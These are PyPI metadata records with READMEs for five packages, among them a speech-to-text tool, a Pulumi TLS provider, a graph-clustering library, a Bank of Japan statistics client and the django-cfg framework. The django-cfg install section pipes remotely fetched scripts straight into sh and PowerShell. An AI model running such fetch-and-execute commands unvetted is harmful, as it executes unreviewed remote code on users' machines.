Run Blurt from a git repo and spoken filenames automatically resolve to `@path/to/file` references that coding agents understand. For example, saying _"check init.py for the bug"_ becomes `check @blurt/__init__.py for the bug`.
## Transcript History
```bash
blurt log # view recent transcripts
```
Logs are stored in `~/.blurt/log.txt`.
## Update
```bash
blurt upgrade
```
## Troubleshooting
| Issue | Fix |
|---|---|
| "Microphone access" prompt doesn't appear | System Settings → Privacy & Security → Microphone → enable your terminal |
| "Accessibility" error | System Settings → Privacy & Security → Accessibility → enable your terminal |
| No audio / recording fails | `brew install portaudio` then restart your terminal |
| Model download stalls | Check disk space (~1.6 GB needed in `~/.cache/huggingface/`) |
## Contributing
```bash
git clone https://github.com/satyaborg/blurt.git
cd blurt
uv pip install -e ".[dev]"
pytest
```
## Privacy
Everything runs on your Mac. No network calls, no telemetry, no data collection. Audio files are saved locally to `~/.blurt/audio/` and never leave your device.
## License
[MIT](LICENSE)
| text/markdown | Satya Borgohain | null | null | null | null | speech-to-text, whisper, mlx, apple-silicon, macos, voice, transcription | [
"Development Status :: 4 - Beta",
"Environment :: MacOS X",
"Intended Audience :: End Users/Desktop",
"Operating System :: MacOS",
"Programming Language :: Python :: 3",
"Topic :: Multimedia :: Sound/Audio :: Speech"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"mlx-whisper",
"sounddevice",
"pynput",
"numpy",
"rich",
"pytest; extra == \"dev\"",
"ruff; extra == \"dev\"",
"pre-commit; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/satyaborg/blurt"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:57:35.397929 | blurt-0.5.5.tar.gz | 1,235,482 | 85/d5/3cc50a3f8ed8b30b0cbbd5a937febba1f876b203174dfbe7483022133377/blurt-0.5.5.tar.gz | source | sdist | null | false | 6f7a2544303c93693c1ce2754dfeae07 | 15525927e340857fd99dd1c240b3c7778b5b28e65f66350d846bdf63cbf73b42 | 85d53cc50a3f8ed8b30b0cbbd5a937febba1f876b203174dfbe7483022133377 | MIT | [
"LICENSE"
] | 238 |
2.4 | pulumi-tls | 5.4.0a1771570098 | A Pulumi package to create TLS resources in Pulumi programs. | [](https://github.com/pulumi/pulumi-tls/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/tls)
[](https://pypi.org/project/pulumi-tls)
[](https://badge.fury.io/nu/pulumi.tls)
[](https://pkg.go.dev/github.com/pulumi/pulumi-tls/sdk/v5/go)
[](https://github.com/pulumi/pulumi-tls/blob/master/LICENSE)
# TLS Resource Provider
The TLS resource provider for Pulumi lets you create TLS keys and certificates in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/tls
or `yarn`:
$ yarn add @pulumi/tls
### Python
To use from Python, install using `pip`:
$ pip install pulumi_tls
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-tls/sdk/v5
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Tls
## Concepts
The `@pulumi/tls` package provides a strongly-typed means to build cloud applications that create
and interact closely with TLS resources.
## Reference
For further information, please visit [the TLS provider docs](https://www.pulumi.com/docs/intro/cloud-providers/tls) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/tls).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, tls | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-tls"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:56:33.287296 | pulumi_tls-5.4.0a1771570098.tar.gz | 30,572 | 30/03/f36f785036bd20f12ef9909f823fa618c6e56900ae7ea34a5fd863357503/pulumi_tls-5.4.0a1771570098.tar.gz | source | sdist | null | false | 633e2713cfa1fc3262de1f9d62c6f15a | 0d20bf594833c539158fd75da0da7478de8d585fc37d75749c0bf248434ed50f | 3003f36f785036bd20f12ef9909f823fa618c6e56900ae7ea34a5fd863357503 | null | [] | 230 |
2.4 | put-asunder | 0.1.1 | Asunder: Constrained Structure Detection on Undirected Graphs. | # Asunder
Asunder is a Python package for constrained network structure detection (graph clustering) on undirected graphs, with workflows centered on column generation and customizable master/subproblem pipelines. In said workflows, expensive Integer Linear Program (ILP) subproblems are replaced with heuristic clustering algorithms while ensuring that dual information from the master problem are respected. This enables the solution of a wide range of constrained structure detection (graph clustering) problems, insofar as a master problem, and any other relevant custom element, can be properly formulated. See [problem fit section](#problem-fit) for more detail.
Development of Asunder is led by Andrew Allman's Process Systems Research Team at the University of Michigan.
## Install
Base install:
```bash
pip install put-asunder
```
Optional extras:
```bash
pip install "put-asunder[graph,viz]"
```
Legacy heuristics (best-effort on Python 3.13):
```bash
pip install "put-asunder[legacy]"
```
## Python Support
- Guaranteed: Python 3.10, 3.11, 3.12, 3.13 for core package.
- Guaranteed: mainstream extras (`graph`, `viz`) on Python 3.10–3.13.
- Best-effort: `legacy` extra on Python 3.13.
## Quickstart
```python
import numpy as np
from asunder import CSDDecomposition, CSDDecompositionConfig
A = np.array([
[0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1],
[0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0]
], dtype=float)
cfg = CSDDecompositionConfig(
ifc_params={"generator": lambda N, **_: [np.ones((N, N))], "num": 1, "args": {"N": A.shape[0]}},
extract_dual=False,
final_master_solve=False,
)
result = CSDDecomposition(config=cfg).run(A)
print(result.metadata)
```
## Solver Setup
Asunder accepts user-provided solver objects. For Gurobi, `GRB_LICENSE_FILE` is used by your environment. Example:
```python
from asunder import create_solver
solver = create_solver("gurobi_direct")
```
## Problem Fit
Asunder works well out of the box for optimization problems where coordination or operations are coupled across space (e.g. central coupling) and/or time and those interactions can be represented as a graph over constraints.
Asunder also supports general constrained partitioning beyond these domain examples when requirements can be expressed as must-link and cannot-link constraints.
Typical fit signals:
- coupling across time periods, units, or resources
- mixed discrete-continuous structure with meaningful constraint interactions
- a useful interpretation of must-link/cannot-link or worthy-edge constraints
- value from multilevel partitioning or core-periphery structure detection
Representative domains:
- stochastic design and dispatch in energy systems
- scheduling and resource allocation in healthcare systems
- planning, routing, and location in supply chain and logistics
- network configuration and resource management in telecommunications
For a fuller guide on where default workflows are sufficient vs where customization helps, see `docs/problem_fit.rst`.
## Customization Points
For custom problems, typical extension points are:
1. Initial feasible partition generator.
2. `solve_master_problem` replacement.
3. Optional heuristic or ILP subproblem replacement.
4. Optional partition refinement stage.
## Constraint Graph Compatibility
For the built-in case-study evaluation workflows (`run_evaluation`), Asunder expects a constraint-graph pattern consistent with the provided case studies.
Required structure for `run_evaluation`-style workflows:
- undirected graph (typically `networkx.Graph`)
- node attribute `constraint` (string tag used for ground-truth and role grouping)
- edge attribute `var_type` with values `"integer"` or `"continuous"`
Commonly present (recommended) attributes:
- node attribute `type` (for example `"constraint"`)
- node attribute `details` (metadata dict)
- edge attributes `weight`, `variables`, `var_types`
How these are used:
- `constraint` identifies core/nonlinear tags in built-in case studies
- `var_type` determines candidate edge sets for CP and CD_Refine paths
If you are not using `run_evaluation` and instead calling decomposition APIs directly, you can work from an adjacency matrix plus explicit `must_link`, `cannot_link`, and optional `worthy_edges`.
## Examples
- Nonlinear B&P-style decomposition: `examples/nonlinear_bp.py`
- Custom subproblem wiring: `examples/custom_subproblem.py`
## Documentation
Sphinx docs are scaffolded in `docs/` and intended for Read the Docs deployment.
## References
Asunder integrates or wraps methods from:
- networkx
- sklearn
- python-igraph / leidenalg
- scikit-network
- signed-louvain style algorithms
| text/markdown | null | Fortune Adekogbe <fortunea@umich.edu>, Allman Group <allmanaa@umich.edu> | null | null | null | graph, constrained-clustering, graph-clustering, community-detection, core-periphery, column-generation, constrained-network-structure-detection, branch-and-price | [
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Intended Audience :: Science/Research"
] | [] | null | null | <3.14,>=3.10 | [] | [] | [] | [
"numpy>=1.26",
"scipy>=1.13",
"networkx>=3.2",
"scikit-learn>=1.5",
"scikit-network>=0.33",
"tqdm>=4.66",
"pyomo>=6.8",
"gurobipy>=11.0",
"python-igraph>=0.11; extra == \"graph\"",
"leidenalg>=0.10; extra == \"graph\"",
"matplotlib>=3.8; extra == \"viz\"",
"seaborn>=0.13; extra == \"viz\"",
"cpnet; extra == \"legacy\"",
"sphinx>=7.4; extra == \"docs\"",
"furo>=2024.8.6; extra == \"docs\"",
"myst-parser>=3.0; extra == \"docs\"",
"sphinx-autodoc-typehints>=2.3; extra == \"docs\"",
"pytest>=8.3; extra == \"dev\"",
"pytest-cov>=5.0; extra == \"dev\"",
"ruff>=0.7; extra == \"dev\"",
"mypy>=1.12; extra == \"dev\"",
"pre-commit>=3.8; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/allman-group/asunder",
"Documentation, https://put-asunder.readthedocs.io",
"Repository, https://github.com/allman-group/asunder"
] | twine/6.2.0 CPython/3.11.13 | 2026-02-20T06:55:56.683980 | put_asunder-0.1.1.tar.gz | 55,305 | 38/bb/800bec4270948ff76faf240282e4de96167b41558ea8b9336898563a67e6/put_asunder-0.1.1.tar.gz | source | sdist | null | false | bc83c90277b34bd969993b3cd8b9b480 | b93c262fad1c118fddb5d2bf28cd1d44ffa721841540259b13095f0c4a64ef0b | 38bb800bec4270948ff76faf240282e4de96167b41558ea8b9336898563a67e6 | BSD-3-Clause | [
"LICENSE"
] | 232 |
2.4 | bojstat-py | 0.1.7 | 日本銀行API向けPythonクライアント | # bojstat — 日本銀行 時系列統計データ Python クライアント
[](https://pypi.org/project/bojstat-py/)
[](https://pypi.org/project/bojstat-py/)
[](https://context7.com/youseiushida/bojstat)
[](https://context7.com/youseiushida/bojstat/llms.txt)
**bojstat** は、[日本銀行 時系列統計データ検索サイト](https://www.stat-search.boj.or.jp/)の API に対応した Python クライアントライブラリです。コード API・階層 API・メタデータ API の 3 種すべてをサポートし、同期・非同期クライアント、自動ページング、ローカルキャッシュ、リトライ、pandas / polars 変換を提供します。内部の HTTP 通信には [httpx](https://github.com/encode/httpx) を使用しています。
[GitHub Repository](https://github.com/youseiushida/bojstat)
[すぐに試せるColab😼](https://colab.research.google.com/drive/1dY9DdZ0pykO6ZCFZhHoxHE-P5T66X4PB?usp=sharing)
## インストール
```sh
pip install bojstat-py
```
オプション依存:
```sh
# pandas 連携
pip install 'bojstat-py[pandas]'
# polars 連携
pip install 'bojstat-py[polars]'
# pandas + polars 両方
pip install 'bojstat-py[dataframe]'
# CLI(typer + rich + pyarrow)
pip install 'bojstat-py[cli]'
```
## クイックスタート
API キーは不要です。インストールしたらすぐに使えます。
```python
from bojstat import BojClient, DB
with BojClient() as client:
# 短観(CO)の業況判断 DI を取得
frame = client.data.get_by_code(
db=DB.短観,
code="TK99F1000601GCQ01000",
start="202401",
end="202504",
)
# with BojClient() as client:
# # 短観(CO)の業況判断 DI を取得
# frame = client.data.get_by_code(
# db=DB.CO,
# code="TK99F1000601GCQ01000",
# start="202401",
# end="202504",
# )
for record in frame.records:
print(record.survey_date, record.value)
```
## DB の発見
50 種の DB コードはすべて `DB` enum と静的カタログに組み込まれています。API ドキュメントを参照する必要はありません。
```python
from bojstat import list_dbs, get_db_info, DB
# 全 DB 一覧
for info in list_dbs():
print(info) # "IR01: 基準割引率および基準貸付利率(従来…)の推移"
# カテゴリで絞り込み
for info in list_dbs(category="マーケット"):
print(info.code, info.name_ja, info.category_ja)
# 個別の DB 情報
info = get_db_info("FM08")
print(info.name_ja) # "外国為替市況"
print(info.category_ja) # "マーケット関連"
# DB enum は StrEnum なので文字列としても動作
print(DB.FM08 == "FM08") # True
```
## 日本語エイリアス
`DB` enum には日本語名のエイリアスが定義されています。IDE の補完機能で日本語名から DB を指定できます。
```python
from bojstat import DB
# 日本語名で指定(エイリアスなので同一オブジェクト)
DB.短観 is DB.CO # True
DB.外国為替市況 is DB.FM08 # True
# 文字列としても動作
DB.短観 == "CO" # True
```
## 系列コードの発見
メタデータ API と `find()` メソッドを組み合わせることで、系列コードをプログラム的に発見できます。
```python
from bojstat import BojClient, DB
with BojClient() as client:
meta = client.metadata.get(db=DB.外国為替市況)
# 系列名で絞り込み
hits = meta.find(name_contains="ドル")
print(hits.series_codes[:5]) # ['FXERD01', 'FXERD02', ...]
# 期種で絞り込み
daily = meta.find(frequency="DAILY")
print(len(daily.records))
# 組み合わせ検索
result = meta.find(name_contains="ドル", frequency="DAILY")
for rec in result.records[:5]:
print(rec.series_code, rec.series_name)
# filter() で任意の条件を指定
hits = meta.filter(lambda r: r.category == "外国為替" and r.layer1 == "1")
print(hits.series_codes)
# find() と filter() のチェーン
result = meta.find(name_contains="ドル").filter(lambda r: r.unit == "円")
```
## 使い方
### コード API
系列コードを指定して時系列データを取得します。
```python
from bojstat import BojClient, DB
with BojClient() as client:
frame = client.data.get_by_code(
db=DB.外国為替市況,
code="FXERD01", # 単一コード(文字列)
start="202401",
end="202412",
)
print(frame.meta.status) # 200
print(len(frame.records)) # レコード数
for rec in frame.records:
print(rec.survey_date, rec.value, rec.unit)
```
複数の系列コードを同時に取得:
```python
frame = client.data.get_by_code(
db=DB.外国為替市況,
code=["FXERD01", "FXERD02"], # リストで複数指定
start="202401",
)
```
### 階層 API
階層情報を指定して時系列データを取得します。
```python
from bojstat import BojClient, DB
with BojClient() as client:
frame = client.data.get_by_layer(
db=DB.国際収支統計,
frequency="M", # 月次
layer=[1, 1, 1], # 階層1=1, 階層2=1, 階層3=1
start="202504",
end="202509",
)
for rec in frame.records:
print(rec.series_code, rec.survey_date, rec.value)
```
ワイルドカード指定:
```python
frame = client.data.get_by_layer(
db=DB.資金循環,
frequency="Q",
layer="*", # 全階層
)
```
### メタデータ API
DB 内の全系列のメタ情報(系列コード、名称、期種、階層、収録期間など)を取得します。
```python
from bojstat import BojClient, DB
with BojClient() as client:
meta = client.metadata.get(db=DB.IR01)
# 全系列コード一覧
print(meta.series_codes)
# 先頭 5 件
for rec in meta.head(5).records:
print(rec.series_code, rec.series_name, rec.frequency)
```
## 非同期クライアント
`AsyncBojClient` をインポートし、`await` を付けるだけです。API は同期版と同一です。
```python
import asyncio
from bojstat import AsyncBojClient, DB
async def main():
async with AsyncBojClient() as client:
frame = await client.data.get_by_code(
db=DB.短観,
code="TK99F1000601GCQ01000",
start="202401",
)
print(len(frame.records))
asyncio.run(main())
```
## pandas / polars 変換
### pandas
```python
from bojstat import BojClient, DB
with BojClient() as client:
frame = client.data.get_by_code(
db=DB.外国為替市況,
code="FXERD01",
start="202401",
)
df = frame.to_pandas()
print(df[["survey_date", "value"]].head())
```
### polars
```python
df = frame.to_polars()
print(df.select(["survey_date", "value"]).head())
```
### メタデータの DataFrame 変換
```python
meta = client.metadata.get(db=DB.外国為替市況)
df = meta.to_pandas() # or meta.to_polars()
print(df.columns.tolist())
```
### 出力形式
時系列データは `to_long()` で辞書リスト(long 形式)、`to_wide()` で pivot 形式に変換できます。
```python
# long 形式(デフォルト: float64)
rows = frame.to_long()
# Decimal 精度を維持
rows = frame.to_long(numeric_mode="decimal")
# wide 形式(series_code が列名)
pivot = frame.to_wide()
```
## 自動ページング
日銀 API には 1 リクエストあたり 250 系列 / 60,000 件の上限があります。bojstat はこれを自動的にハンドリングし、`NEXTPOSITION` を追跡して全データを透過的に取得します。
```python
# 階層 API: auto_paginate=True(デフォルト)で全ページ自動取得
frame = client.data.get_by_layer(
db=DB.FF,
frequency="Q",
layer="*",
)
# frame.records に全レコードが格納される
```
手動ページングが必要な場合:
```python
frame = client.data.get_by_layer(
db=DB.資金循環,
frequency="Q",
layer="*",
auto_paginate=False, # 1 ページだけ取得
)
print(frame.meta.next_position) # 次回開始位置(None なら全取得済み)
```
## キャッシュ
デフォルトでは、`cache_dir` を指定するとローカルファイルキャッシュが有効になります。TTL(デフォルト 24 時間)内は API を呼ばずにキャッシュから返却します。
```python
from bojstat import BojClient, CacheMode
client = BojClient(
cache_dir="./cache", # キャッシュディレクトリ
cache_ttl=60 * 60 * 12, # 12 時間
)
# キャッシュモードの変更
client = BojClient(
cache_dir="./cache",
cache_mode=CacheMode.FORCE_REFRESH, # 常に再取得
)
# キャッシュ無効化
client = BojClient(
cache_mode=CacheMode.OFF,
)
```
## エラーハンドリング
API エラーや通信エラーは、種別に応じた例外クラスで送出されます。すべての例外は `BojError` を継承しています。
```python
import bojstat
from bojstat import BojClient
with BojClient() as client:
try:
frame = client.data.get_by_code(db="INVALID", code="XXX")
except bojstat.BojBadRequestError as e:
# STATUS=400(パラメータ誤り)
print(e.status, e.message_id, e.message)
except bojstat.BojServerError as e:
# STATUS=500(サーバーエラー)
print(e.status, e.message)
except bojstat.BojUnavailableError as e:
# STATUS=503(DB アクセスエラー)
print(e.status, e.message)
except bojstat.BojTransportError as e:
# ネットワーク接続エラー・タイムアウト
print(e)
except bojstat.BojValidationError as e:
# 送信前バリデーションエラー
print(e.validation_code, e)
```
例外の一覧:
| STATUS | 例外クラス | 説明 |
|:---|:---|:---|
| 400 | `BojBadRequestError` | パラメータ誤り |
| 500 | `BojServerError` | 予期しないエラー |
| 503 | `BojUnavailableError` | DB アクセスエラー |
| — | `BojGatewayError` | 上流ゲートウェイの非 JSON 応答 |
| — | `BojTransportError` | ネットワーク接続・タイムアウト |
| — | `BojValidationError` | 送信前バリデーション |
| — | `BojDateParseError` | DATE 解析失敗 |
| — | `BojConsistencyError` | 整合性検証エラー |
| — | `BojPaginationStalledError` | ページング停止 |
| — | `BojResumeTokenMismatchError` | 再開トークン不一致 |
### エラー分類
`MESSAGEID` からエラーの意味カテゴリを判定できます。
```python
from bojstat import BojClient
with BojClient() as client:
result = client.errors.classify(status=400, message_id="M181005E")
print(result.category) # "invalid_db"
print(result.confidence) # 1.0
```
## リトライ
通信エラー(タイムアウト、接続エラー)および STATUS 429/500/503 は、指数バックオフで自動リトライされます(デフォルト最大 5 回)。
```python
from bojstat import BojClient
# リトライ設定のカスタマイズ
client = BojClient(
retry_max_attempts=3, # 最大試行回数(デフォルト: 5)
retry_base_delay=1.0, # バックオフ基準秒(デフォルト: 0.5)
retry_cap_delay=16.0, # バックオフ上限秒(デフォルト: 8.0)
)
# リトライ無効化
client = BojClient(retry_max_attempts=1)
```
## レート制限
高頻度アクセスによる接続遮断を防ぐため、デフォルトで 1 秒あたり 1 リクエストのレート制限が適用されます。
```python
client = BojClient(
rate_limit_per_sec=0.5, # 2 秒に 1 回
)
```
## タイムアウト
デフォルトのタイムアウトは 30 秒です。
```python
from bojstat import BojClient
client = BojClient(timeout=60.0) # 60 秒に変更
```
## 言語と出力形式
```python
from bojstat import BojClient, Lang, Format
# 英語 + JSON(デフォルト: 日本語 + JSON)
client = BojClient(lang=Lang.EN, format=Format.JSON)
# リクエスト単位での上書きも可能
frame = client.data.get_by_code(
db="FM08",
code="FXERD01",
lang="en", # このリクエストだけ英語
)
```
## CLI
`bojstat-py[cli]` をインストールすると、コマンドラインから直接データを取得できます。
```sh
# メタデータを JSON で保存
bojstat metadata --db FM08 --out meta.json
# コード API で取得して CSV に保存
bojstat code --db CO --code TK99F1000601GCQ01000 --start 202401 --out data.csv
# 階層 API で取得して Parquet に保存
bojstat layer --db BP01 --frequency M --layer "1,1,1" --start 202504 --out data.parquet
```
## HTTP クライアントのカスタマイズ
内部の [httpx](https://www.python-httpx.org/) クライアントを直接指定できます。
```python
import httpx
from bojstat import BojClient
# プロキシ経由
client = BojClient(proxy="http://my.proxy:8080")
# HTTP/2 有効化(pip install 'httpx[http2]' が必要)
client = BojClient(http2=True)
# 外部 httpx.Client を注入
http_client = httpx.Client(
base_url="https://www.stat-search.boj.or.jp/api/v1",
timeout=60.0,
)
client = BojClient(http_client=http_client)
```
## HTTP リソースの管理
デフォルトでは、`close()` を呼ぶか、コンテキストマネージャを使用して HTTP 接続を解放します。
```python
from bojstat import BojClient
# コンテキストマネージャ(推奨)
with BojClient() as client:
frame = client.data.get_by_code(db="CO", code="TK99F1000601GCQ01000")
# 手動クローズ
client = BojClient()
try:
frame = client.data.get_by_code(db="CO", code="TK99F1000601GCQ01000")
finally:
client.close()
```
非同期版:
```python
async with AsyncBojClient() as client:
...
# または
client = AsyncBojClient()
try:
...
finally:
await client.aclose()
```
## 高度な設定
### 整合性モード
大量ページング中にサーバー側データが更新された場合の挙動を制御します。
```python
from bojstat import BojClient, ConsistencyMode
# strict: 不整合検知時に例外(デフォルト)
client = BojClient(consistency_mode=ConsistencyMode.STRICT)
# best_effort: 警告化して継続
client = BojClient(consistency_mode=ConsistencyMode.BEST_EFFORT)
```
### コード自動分割
250 件を超える系列コードを自動的にチャンク分割してリクエストします。
```python
client = BojClient(
strict_api=False, # strict モードを無効化
auto_split_codes=True, # 自動分割を有効化
)
# 250 件以上のコードを一度に指定可能
frame = client.data.get_by_code(
db="FF",
code=large_code_list, # 500 件以上でも OK
)
```
### レスポンスメタ情報
すべてのレスポンスには `meta` 属性が付属し、API の処理結果情報を参照できます。
```python
frame = client.data.get_by_code(db="CO", code="TK99F1000601GCQ01000")
print(frame.meta.status) # 200
print(frame.meta.message_id) # "M181000I"
print(frame.meta.message) # "正常に終了しました。"
print(frame.meta.date_parsed) # datetime オブジェクト
print(frame.meta.request_url) # 実行された URL
print(frame.meta.next_position) # 次回検索開始位置(None なら全取得済み)
print(frame.meta.resume_token) # 再開トークン
```
## 動作要件
Python 3.12 以上。
| text/markdown | null | null | null | null | null | null | [] | [] | null | null | >=3.12 | [] | [] | [] | [
"httpx>=0.28.1",
"pyarrow>=18.0.0; extra == \"cli\"",
"rich>=13.0.0; extra == \"cli\"",
"typer>=0.16.0; extra == \"cli\"",
"pandas>=2.2.0; extra == \"dataframe\"",
"polars>=1.0.0; extra == \"dataframe\"",
"pandas>=2.2.0; extra == \"pandas\"",
"polars>=1.0.0; extra == \"polars\""
] | [] | [] | [] | [
"Repository, https://github.com/youseiushida/bojstat"
] | uv/0.9.18 {"installer":{"name":"uv","version":"0.9.18","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null} | 2026-02-20T06:55:46.736916 | bojstat_py-0.1.7.tar.gz | 89,057 | 52/88/36ec4344c3f0c739ebfd219f21f4e70cfd06a85ce447f56dbaa04af8aad0/bojstat_py-0.1.7.tar.gz | source | sdist | null | false | 8cfb1837de54675469144a8f4f89bb13 | c430375fc219bcf154544f7331c8f92bcfa343c25d537996a6339221f9643e94 | 528836ec4344c3f0c739ebfd219f21f4e70cfd06a85ce447f56dbaa04af8aad0 | null | [
"LICENSE"
] | 238 |
2.4 | django-cfg | 1.7.20 | Modern Django framework with type-safe Pydantic v2 configuration, Next.js admin integration, real-time WebSockets, and 8 enterprise apps. Replace settings.py with validated models, 90% less code. Production-ready with AI agents, auto-generated TypeScript clients, and zero-config features. | <div align="center">
<img src="https://raw.githubusercontent.com/markolofsen/django-cfg/refs/heads/main/static/logo.png" alt="Django-CFG Logo" width="200" />
# Django-CFG
[](https://pypi.org/project/django-cfg/)
[](https://www.python.org/)
[](https://www.djangoproject.com/)
[](LICENSE)
[](https://pypi.org/project/django-cfg/)
**The Modern Django Framework for Enterprise Applications**
Type-safe configuration • Next.js Admin • Real-time WebSockets • gRPC Streaming • AI-Native Docs • 8 Production Apps
[Get Started](https://djangocfg.com/docs/getting-started/intro) • [Live Demo](https://djangocfg.com/demo) • [Documentation](https://djangocfg.com/docs) • [MCP Server](https://djangocfg.com/mcp)
</div>
---
## What is Django-CFG?
**Django-CFG** is a next-generation Django framework that replaces `settings.py` with **type-safe Pydantic v2 models**. Catch configuration errors at startup, get full IDE autocomplete, and ship production-ready features in **30 seconds** instead of weeks.
### Why Django-CFG?
- ✅ **Type-safe config** - Pydantic v2 validation catches errors before deployment
- ✅ **90% less code** - Replace 200+ line settings.py with 30 lines
- ✅ **Built-in Next.js admin** - Modern React admin interface out of the box
- ✅ **Real-time WebSockets** - Centrifugo integration included
- ✅ **gRPC streaming** - Bidirectional streaming with WebSocket bridge
- ✅ **AI-native docs** - First Django framework with MCP server for AI assistants
- ✅ **8 enterprise apps** - Save 18+ months of development
---
## Quick Start
### One-Line Install
```bash
# macOS / Linux
curl -L https://djangocfg.com/install.sh | sh
# Windows (PowerShell)
powershell -c "iwr https://djangocfg.com/install.ps1 | iex"
```
### Manual Install
```bash
pip install 'django-cfg[full]'
django-cfg create-project my_app
cd my_app/projects/django
poetry run python manage.py runserver
```
**What you get instantly:**
- 🎨 Django Admin → `http://127.0.0.1:8000/admin/`
- ⚛️ Next.js Dashboard → Modern React interface
- 📡 Real-time WebSockets → Live updates
- 🐳 Docker Ready → Production configs
- 🖥️ Electron App → Desktop template
[→ Full Installation Guide](https://djangocfg.com/docs/getting-started/installation)
---
## Configuration Example
**Before: settings.py**
```python
# 200+ lines of untyped configuration
DEBUG = os.getenv('DEBUG', 'False') == 'True' # ❌ Bug waiting to happen
DATABASE_PORT = os.getenv('DB_PORT', '5432') # ❌ Still a string!
```
**After: Django-CFG**
```python
from django_cfg import DjangoConfig, DatabaseConfig
class MyConfig(DjangoConfig):
project_name: str = "My App"
debug: bool = False # ✅ Type-safe
databases: dict[str, DatabaseConfig] = {
"default": DatabaseConfig(
name="${DB_NAME}", # ✅ Validated at startup
port=5432, # ✅ Correct type
)
}
```
**Full IDE autocomplete** • **Startup validation** • **Zero runtime errors**
---
## Features
### 🔒 Type-Safe Configuration
Pydantic v2 models replace error-prone `settings.py` - catch bugs before deployment.
### ⚛️ Next.js Admin
Only Django framework with built-in Next.js integration - modern admin UI out of the box.
### 📡 Real-Time WebSockets
Production-ready Centrifugo integration - live updates, notifications, presence tracking.
### 🌐 gRPC Microservices
Bidirectional streaming with automatic WebSocket bridge - perfect for real-time architectures.
### 🤖 AI-Native Documentation
First Django framework with MCP server - AI assistants can access docs instantly.
### 📦 8 Enterprise Apps
User auth • Support tickets • Newsletter • CRM • AI agents • Knowledge base • Payments • Multi-site
**Time saved: 18+ months of development**
[→ See All Features](https://djangocfg.com/docs)
---
## What's Included
**Backend:**
- Django 5.2+ with type-safe config
- PostgreSQL, Redis, Centrifugo
- gRPC server with streaming
- 8 production-ready apps
- AI agent framework
- REST API with auto TypeScript generation
**Frontend:**
- Next.js 16 admin interface
- React 19 + TypeScript
- Tailwind CSS 4
- Real-time WebSocket client
- PWA support
**DevOps:**
- Docker Compose setup
- Traefik reverse proxy
- Production-ready configs
- Cloudflare integration
**AI Features:**
- MCP server for AI assistants
- Pydantic AI integration
- Vector DB (ChromaDB)
- RAG support
---
## Documentation
- **[Getting Started](https://djangocfg.com/docs/getting-started/intro)** - Quick setup guide
- **[Configuration](https://djangocfg.com/docs/getting-started/configuration)** - Type-safe config
- **[Next.js Admin](https://djangocfg.com/docs/features/integrations/nextjs-admin)** - Modern admin UI
- **[Real-Time](https://djangocfg.com/docs/features/integrations/centrifugo)** - WebSockets setup
- **[gRPC](https://djangocfg.com/docs/features/integrations/grpc)** - Microservices
- **[AI Agents](https://djangocfg.com/docs/ai-agents/introduction)** - Automation
- **[Built-in Apps](https://djangocfg.com/docs/features/built-in-apps/overview)** - 8 enterprise apps
---
## Community
- 🌐 **[djangocfg.com](https://djangocfg.com/)** - Official website
- 🎯 **[Live Demo](https://djangocfg.com/demo)** - See it in action
- 🐙 **[GitHub](https://github.com/markolofsen/django-cfg)** - Source code
- 💬 **[Discussions](https://github.com/markolofsen/django-cfg/discussions)** - Get help
- 📦 **[PyPI](https://pypi.org/project/django-cfg/)** - Package repository
---
## License
MIT License - Free for commercial use
---
<div align="center">
**Django-CFG** - Modern Django framework with type-safe configuration, AI-native docs, Next.js admin, gRPC streaming, real-time WebSockets, and 8 production-ready apps.
Made with ❤️ for the Django community
[Get Started](https://djangocfg.com/docs) • [Live Demo](https://djangocfg.com/demo) • [GitHub](https://github.com/markolofsen/django-cfg)
</div>
| text/markdown | null | Django-CFG Team <info@djangocfg.com> | null | Django-CFG Team <info@djangocfg.com> | MIT | ai-agents, centrifugo, configuration, django, django-environ, django-settings, enterprise-django, ide-autocomplete, modern-django, nextjs-admin, pydantic, pydantic-settings, react-admin, real-time, settings, startup-validation, type-safe-config, type-safety, typescript-generation, websocket | [
"Development Status :: 4 - Beta",
"Framework :: Django",
"Framework :: Django :: 5.2",
"Intended Audience :: Developers",
